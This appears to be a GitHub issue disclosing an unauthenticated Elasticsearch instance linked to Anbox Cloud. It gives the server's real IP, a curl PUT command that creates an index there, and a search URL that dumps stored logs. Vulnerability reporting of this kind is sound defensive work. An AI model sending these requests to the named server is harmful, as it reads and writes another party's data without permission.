Elasticsearch instance   unprotected, thus allowing an attacker to perform write/read operations on the database anbox cloud

i found bug Elasticsearch instance   unprotected, thus allowing an
attacker to perform write/read operations on the database
anbox cloud   
 step to create
1- i use for exploit bug  and create poc in db by used in linux os

curl -XPUT 'http://40.68.164.154:9200/poc3'   and see create poc in db
http://40.68.164.154:9200/poc3
 and go to  http://40.68.164.154:9200/.ds-logs-generic-default-2024.08.26-000006/_search?size=1000 and see  https://contracts.canonical.com/v1/resources?architecture=amd64&kernel=6.5.0-1017-azure&series=jammy&virt=microsoft and after go to this url  and see anbox-cloud which used  azure cloud  provider 

thus allowing an attacker to perform write/read operations on the
attacker to perform write/read operations on the database
anbox cloud

<img width="694" alt="Image" src="https://github.com/user-attachments/assets/8acc4c40-e9a2-46fa-8371-1bc8392e7710" />
<img width="1226" alt="Image" src="https://github.com/user-attachments/assets/4d68ec78-7ede-4c45-9c46-0cbbfd2b8ea1" />
<img width="1226" alt="Image" src="https://github.com/user-attachments/assets/613a8c36-ce28-488a-9092-761afd10019b" />
<img width="1226" alt="Image" src="https://github.com/user-attachments/assets/e47c23cf-8933-4ed7-abd7-15d3108aef1d" />

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database anbox cloud #363

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database anbox cloud #363

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions